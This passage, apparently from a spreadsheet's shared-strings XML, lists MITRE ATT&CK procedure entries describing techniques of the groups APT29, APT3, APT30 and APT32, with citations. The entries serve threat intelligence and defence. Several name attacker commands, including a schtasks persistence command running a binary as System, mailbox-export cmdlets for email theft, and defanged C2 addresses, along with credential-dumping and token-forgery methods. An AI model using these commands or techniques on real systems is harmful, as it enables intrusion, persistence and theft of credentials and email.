    <t>[APT29](https://attack.mitre.org/groups/G0016) has used compromised local accounts to access victims' networks.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used various forms of spearphishing attempting to get a user to open attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files. (Citation: F-Secure The Dukes) (Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: ESET T3 Threat Report 2021)(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used various forms of spearphishing attempting to get a user to click on a malicous link.(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: MSTIC NOBELIUM May 2021)(Citation: Secureworks IRON RITUAL USAID Phish May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has leveraged numerous pieces of malware that appear to be unique to [APT29](https://attack.mitre.org/groups/G0016) and were likely developed for or by the group.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: CrowdStrike SUNSPOT Implant January 2021)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has embedded ISO images and VHDX files in HTML to evade Mark-of-the-Web.(Citation: ESET T3 Threat Report 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) named tasks &lt;code&gt;\Microsoft\Windows\SoftwareProtectionPlatform\EventCacheManager&lt;/code&gt; in order to appear legitimate.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has set the hostnames of its C2 infrastructure to match legitimate hostnames in the victim environment. They have also used IP addresses originating from the same country as the victim for their VPN infrastructure.(Citation: FireEye SUNBURST Backdoor December 2020)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) renamed software and DLL's with legitimate names to appear benign.(Citation: Volexity SolarWinds)(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: SentinelOne NobleBaron June 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has use `mshta` to execute malicious scripts on a compromised host.(Citation: ESET T3 Threat Report 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used repeated MFA requests to gain access to victim accounts.(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)</t>
  </si>
  <si>
    <t>A backdoor used by [APT29](https://attack.mitre.org/groups/G0016) created a [Tor](https://attack.mitre.org/software/S0183) hidden service to forward traffic from the [Tor](https://attack.mitre.org/software/S0183) client to local ports 3389 (RDP), 139 (Netbios), and 445 (SMB) enabling full remote access from outside the network and has also used TOR.(Citation: Mandiant No Easy Breach)(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used TCP for C2 communications.(Citation: FireEye APT29 Nov 2018)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used encoded PowerShell commands.(Citation: FireEye APT29 Nov 2018)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used Kerberos ticket attacks for lateral movement.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has conducted brute force password spray attacks.(Citation: MSRC Nobelium June 2021)(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used the &lt;code&gt;Get-ManagementRoleAssignment&lt;/code&gt; PowerShell cmdlet to enumerate Exchange management role assignments through an Exchange Management Shell.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used encoded PowerShell scripts uploaded to [CozyCar](https://attack.mitre.org/software/S0046) installations to download and install [SeaDuke](https://attack.mitre.org/software/S0053). [APT29](https://attack.mitre.org/groups/G0016) also used PowerShell to create new tasks on remote machines, identify configuration settings, evade defenses, exfiltrate data, and to execute other commands.(Citation: Volexity SolarWinds)(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: Symantec Seaduke 2015)(Citation: Mandiant No Easy Breach)(Citation: FireEye APT29 Nov 2018)(Citation: CrowdStrike StellarParticle January 2022)(Citation: ESET T3 Threat Report 2021)(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) obtained PKI keys, certificate files and the private encryption key from an Active Directory Federation Services (AD FS) container to decrypt corresponding SAML signing certificates.(Citation: Microsoft 365 Defender Solorigate)(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used multiple command-line utilities to enumerate running processes.(Citation: Volexity SolarWinds)(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has developed malware variants written in Python.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) added Registry Run keys to establish persistence.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) staged data and files in password-protected archives on a victim's OWA server.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used RDP sessions from public-facing systems to internal servers.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) collected emails from specific individuals, such as executives and IT staff, using &lt;code&gt;New-MailboxExportRequest&lt;/code&gt; followed by &lt;code&gt;Get-MailboxExportRequest&lt;/code&gt;.(Citation: Volexity SolarWinds)(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used [AdFind](https://attack.mitre.org/software/S0552) to enumerate remote systems.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used &lt;code&gt;Rundll32.exe&lt;/code&gt; to execute payloads.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: Microsoft Deep Dive Solorigate January 2021)(Citation: FireEye APT29 Nov 2018)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) created tokens using compromised SAML signing certificates.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used administrative accounts to connect over SMB to targeted users.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used &lt;code&gt;scheduler&lt;/code&gt; and &lt;code&gt;schtasks&lt;/code&gt; to create new tasks on remote hosts as part of lateral movement.(Citation: Volexity SolarWinds) They have manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returned the scheduled task to its original configuration.(Citation: FireEye SUNBURST Backdoor December 2020) [APT29](https://attack.mitre.org/groups/G0016) also created a scheduled task to maintain [SUNSPOT](https://attack.mitre.org/software/S0562) persistence when the host booted during the 2020 SolarWinds intrusion.(Citation: CrowdStrike SUNSPOT Implant January 2021) They previously used named and hijacked scheduled tasks to also establish persistence.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used UPX to pack files.(Citation: Mandiant No Easy Breach)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used spearphishing emails with an attachment to deliver files with exploits to initial victims.(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)(Citation: ESET Dukes October 2019)(Citation: MSTIC NOBELIUM May 2021)(Citation: ESET T3 Threat Report 2021)(Citation: Secureworks IRON HEMLOCK Profile)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used spearphishing with a link to trick victims into clicking on a link to a zip file containing malicious files.(Citation: Mandiant No Easy Breach)(Citation: MSTIC NOBELIUM May 2021)(Citation: Secureworks IRON RITUAL USAID Phish May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used the legitimate mailing service Constant Contact to send phishing e-mails.
(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has stolen Chrome browser cookies by copying the Chrome profile directories of targeted users.(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has abused misconfigured AD CS certificate templates to impersonate admin users and create additional authentication certificates.(Citation: Mandiant APT29 Trello)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used steganography to hide C2 communications in images.(Citation: ESET Dukes October 2019)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used &lt;code&gt;fsutil&lt;/code&gt; to check available free space before executing actions that might create large files on disk.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) modified timestamps of backdoors to match legitimate Windows files.(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has obtained and used a variety of tools including [Mimikatz](https://attack.mitre.org/software/S0002), [SDelete](https://attack.mitre.org/software/S0195), [Tor](https://attack.mitre.org/software/S0183), [meek](https://attack.mitre.org/software/S0175), and [Cobalt Strike](https://attack.mitre.org/software/S0154).(Citation: Mandiant No Easy Breach)(Citation: F-Secure The Dukes)(Citation: FireEye APT29 Nov 2018)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has gained access through compromised accounts at cloud solution partners, and used compromised certificates issued by Mimecast to authenticate to Mimecast customer systems.(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: CrowdStrike StellarParticle January 2022)(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used forged SAML tokens that allowed the actors to impersonate users and bypass MFA, enabling [APT29](https://attack.mitre.org/groups/G0016) to access enterprise cloud applications and services.(Citation: Microsoft 365 Defender Solorigate)(Citation: Secureworks IRON RITUAL Profile)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used different compromised credentials for remote access and to move laterally.(Citation: FireEye SUNBURST Backdoor December 2020)(Citation: MSTIC NOBELIUM Mar 2021)(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has written malware variants in Visual Basic.(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has conducted widespread scanning of target environments to identify vulnerabilities for exploit.(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has bypassed MFA set on OWA accounts by generating a cookie value from a previously stolen secret key.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used HTTP for C2 and data exfiltration.(Citation: Volexity SolarWinds)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has registered algorithmically generated Twitter handles that are used for C2 by malware, such as [HAMMERTOSS](https://attack.mitre.org/software/S0037). [APT29](https://attack.mitre.org/groups/G0016) has also used legitimate web services such as Dropbox and Constant Contact in their operations.(Citation: FireEye APT29)(Citation: MSTIC NOBELIUM May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used stolen cookies to access cloud resources, and a forged &lt;code&gt;duo-sid&lt;/code&gt; cookie to bypass MFA set on an email account.(Citation: Volexity SolarWinds)(Citation: CrowdStrike StellarParticle January 2022)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has installed web shells on exploited Microsoft Exchange servers.(Citation: Cybersecurity Advisory SVR TTP May 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used &lt;code&gt;cmd.exe&lt;/code&gt; to execute commands on remote machines.(Citation: Volexity SolarWinds)(Citation: Microsoft Analyzing Solorigate Dec 2020)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) used WMI to steal credentials and execute backdoors at a future time.(Citation: Mandiant No Easy Breach) They have also used WMI for the remote execution of files for lateral movement.(Citation: Microsoft 365 Defender Solorigate)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used WMI event subscriptions for persistence.(Citation: Mandiant No Easy Breach)(Citation: ESET Dukes October 2019)(Citation: Microsoft 365 Defender Solorigate)(Citation: Microsoft Deep Dive Solorigate January 2021)</t>
  </si>
  <si>
    <t>[APT29](https://attack.mitre.org/groups/G0016) has used WinRM via PowerShell to execute command and payloads on remote hosts.(Citation: Symantec RAINDROP January 2021)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) replaces the Sticky Keys binary &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt; for persistence.(Citation: aptsim)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to add created accounts to local admin groups to maintain elevated access.(Citation: aptsim)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has used tools to compress data before exfilling it.(Citation: aptsim)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can locate credentials in files on the file system such as those from Firefox or Chrome.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has used tools to dump passwords from browsers.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to side load DLLs with a valid version of Chrome with one of their tools.(Citation: FireEye Clandestine Fox)(Citation: FireEye Clandestine Fox Part 2)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) will identify Microsoft Office documents on the victim's computer.(Citation: aptsim)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) leverages valid accounts after gaining credentials for use within the victim domain.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that exfiltrates data over the C2 channel.(Citation: FireEye Clandestine Fox)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Clandestine Fox)</t>
  </si>
  <si>
    <t>An [APT3](https://attack.mitre.org/groups/G0022) downloader establishes SOCKS5 connections for its initial C2.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can delete files.(Citation: FireEye Clandestine Fox)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that looks for files and directories on the local file system.(Citation: FireEye Clandestine Fox)(Citation: evolution of pirpi)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to use &lt;code&gt;-WindowStyle Hidden&lt;/code&gt; to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to remove indicators of compromise from tools.(Citation: APT3 Adversary Emulation Plan)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can copy files to remote machines.(Citation: FireEye Clandestine Fox)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has used a keylogging tool that records keystrokes in encrypted files.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has used a tool to dump credentials by injecting itself into lsass.exe and triggering with the argument "dig."(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to create or enable accounts, such as &lt;code&gt;support_388945a0&lt;/code&gt;.(Citation: aptsim)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has used a tool that can obtain info about local and global group users, power users, and administrators.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to stage files for exfiltration in a single location.(Citation: aptsim)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has lured victims into clicking malicious links delivered through spearphishing.(Citation: FireEye Clandestine Wolf)</t>
  </si>
  <si>
    <t>An [APT3](https://attack.mitre.org/groups/G0022) downloader first establishes a SOCKS5 connection to 192.157.198[.]103 using TCP port 1913; once the server response is verified, it then requests a connection to 192.184.60[.]229 on TCP port 81.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) obfuscates files or information to help evade defensive measures.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has been known to brute force password hashes to be able to leverage plain text credentials.(Citation: APT3 Adversary Emulation Plan)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can enumerate the permissions associated with Windows groups.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has used PowerShell on victim systems to download and run payloads after exploitation.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can list out currently running processes.(Citation: FireEye Clandestine Fox)(Citation: evolution of pirpi)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) places scripts in the startup folder for persistence.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) enables the Remote Desktop Protocol for persistence.(Citation: aptsim) [APT3](https://attack.mitre.org/groups/G0022) has also interacted with compromised systems to browse and copy files through RDP sessions.(Citation: Twitter Cglyer Status Update APT3 eml)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can detect the existence of remote systems.(Citation: Symantec Buckeye)(Citation: FireEye Clandestine Fox)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can run DLLs.(Citation: FireEye Clandestine Fox)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) will copy files over to Windows Admin Shares (like ADMIN$) as part of lateral movement.(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>An [APT3](https://attack.mitre.org/groups/G0022) downloader creates persistence by creating the following scheduled task: &lt;code&gt;schtasks /create /tn "mysc" /tr C:\Users\Public\test.exe /sc ONLOGON /ru "System"&lt;/code&gt;.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT3](https://attack.mitre.org/groups/G0022) has been known to pack their tools.(Citation: APT3 Adversary Emulation Plan)(Citation: FireEye Clandestine Wolf) </t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has sent spearphishing emails containing malicious links.(Citation: FireEye Clandestine Wolf)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can obtain information about the local system.(Citation: Symantec Buckeye)(Citation: evolution of pirpi)</t>
  </si>
  <si>
    <t>A keylogging tool used by [APT3](https://attack.mitre.org/groups/G0022) gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway.(Citation: Symantec Buckeye)(Citation: evolution of pirpi)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that can enumerate current network connections.(Citation: Symantec Buckeye)(Citation: FireEye Clandestine Fox)(Citation: evolution of pirpi)</t>
  </si>
  <si>
    <t>An [APT3](https://attack.mitre.org/groups/G0022) downloader uses the Windows command &lt;code&gt;"cmd.exe" /C whoami&lt;/code&gt; to verify that it is running with the elevated privileges of “System.”(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>An [APT3](https://attack.mitre.org/groups/G0022) downloader uses the Windows command &lt;code&gt;"cmd.exe" /C whoami&lt;/code&gt;. The group also uses a tool to execute commands on remote computers.(Citation: FireEye Operation Double Tap)(Citation: Symantec Buckeye)</t>
  </si>
  <si>
    <t>[APT3](https://attack.mitre.org/groups/G0022) has a tool that creates a new service for persistence.(Citation: FireEye Operation Double Tap)</t>
  </si>
  <si>
    <t>[APT30](https://attack.mitre.org/groups/G0013) has relied on users to execute malicious file attachments delivered via spearphishing emails.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[APT30](https://attack.mitre.org/groups/G0013) has used spearphishing emails with malicious DOC attachments.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has used LZMA compression and RC4 encryption before exfiltration.(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) includes garbage code to mislead anti-malware software and researchers.(Citation: ESET OceanLotus)(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has cleared select event log entries.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050) has used COM scriptlets to download Cobalt Strike beacons.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used Outlook Credential Dumper to harvest credentials stored in Windows registry.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) ran legitimately-signed executables from Symantec and McAfee which load a malicious DLL. The group also side-loads its backdoor by dropping a library and a legitimate, signed executable (AcroTranscoder).(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has set up and operated websites to gather information and deliver malware.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has infected victims by tricking them into visiting compromised watering hole websites.(Citation: ESET OceanLotus)(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has stood up websites containing numerous articles and content scraped from the Internet to make them appear legitimate, but some of these pages include malicious JavaScript to profile the potential victim or infect them via a fake software update.(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has collected e-mail addresses for activists and bloggers in order to target them with spyware.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has exfiltrated data using the already opened channel with its C&amp;C server.(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets.(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used RTF document that includes an exploit to execute malicious code. (CVE-2017-11882)(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used CVE-2016-7255 to escalate privileges.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s macOS backdoor can receive a “delete” command.(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050)'s backdoor possesses the capability to list files and directories on a machine. (Citation: ESET OceanLotus Mar 2019)	
</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has conducted targeted surveillance against activists and bloggers.(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s macOS backdoor hides the clientID file via a chflags function.(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used the WindowStyle parameter to conceal [PowerShell](https://attack.mitre.org/techniques/T1059/001) windows. (Citation: FireEye APT32 May 2017) (Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.(Citation: Volexity OceanLotus Nov 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used JavaScript for drive-by downloads and C2 communications.(Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has abused the PasswordChangeNotify to monitor for and capture account password changes.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used Mimikatz and customized versions of Windows Credential Dumper to harvest credentials.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050) has deployed tools after moving laterally using administrative accounts.(Citation: Cybereason Cobalt Kitty 2017)	</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050)'s macOS backdoor changes the permission of the file it wants to execute to 755.(Citation: ESET OceanLotus macOS April 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) enumerated administrative users using the commands &lt;code&gt;net localgroup administrators&lt;/code&gt;.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used legitimate local admin account credentials.(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used email for C2 via an Office macro.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has attempted to lure users to execute a malicious dropper delivered via a spearphishing attachment.(Citation: ESET OceanLotus)(Citation: Cybereason Oceanlotus May 2017)(Citation: ESET OceanLotus Mar 2019)(Citation: FireEye APT32 April 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has lured targets to download a Cobalt Strike beacon by including a malicious link within spearphishing emails.(Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used hidden or non-printing characters to help masquerade service names, such as appending a Unicode no-break space character to a legitimate service name. [APT32](https://attack.mitre.org/groups/G0050) has also impersonated the legitimate Flash installer file name "install_flashplayer.exe".(Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has disguised a Cobalt Strike beacon as a Flash Installer.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update. [APT32](https://attack.mitre.org/groups/G0050) has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe. (Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[APT32](https://attack.mitre.org/groups/G0050)'s backdoor has modified the Windows Registry to store the backdoor's configuration. (Citation: ESET OceanLotus Mar 2019)	
</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) has used mshta.exe for code execution.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used NTFS alternate data streams to hide their payloads.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) performed network scanning on the network to search for open ports, services, OS finger-printing, and other vulnerabilities.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used the &lt;code&gt;net view&lt;/code&gt; command to show all shares available, including the administrative shares such as &lt;code&gt;C$&lt;/code&gt; and &lt;code&gt;ADMIN$&lt;/code&gt;.(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
    <t>An [APT32](https://attack.mitre.org/groups/G0050) backdoor can use HTTP over a non-standard TCP port (e.g 14146) which is specified in the backdoor configuration.(Citation: ESET OceanLotus Mar 2019)</t>
  </si>
  <si>
    <t>[APT32](https://attack.mitre.org/groups/G0050) used GetPassword_x64 to harvest credentials.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)</t>
  </si>
  <si>
